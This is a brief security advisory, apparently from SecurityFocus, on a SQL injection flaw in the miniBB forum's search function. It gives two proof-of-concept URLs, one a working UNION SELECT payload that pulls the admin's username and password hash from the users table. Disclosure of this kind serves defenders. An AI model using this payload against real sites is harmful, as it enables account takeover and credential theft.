miniBB BB_FUNC_SEARCH.PHP SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URIs are available:

http://www.example.com/index.php?action=search&where=3&searchGo=1&table=[SQL]
http://www.example.com/index.php?action=search&where=3&searchGo=1&table=minibbtable_posts/**/LIMIT/**/0/**/UNION/**/SELECT/**/hex(concat(username,0x20,user_password))/**/FROM/**/minibbtable_users/**/WHERE/**/user_id=1/*


 

Privacy Statement
Copyright 2010, SecurityFocus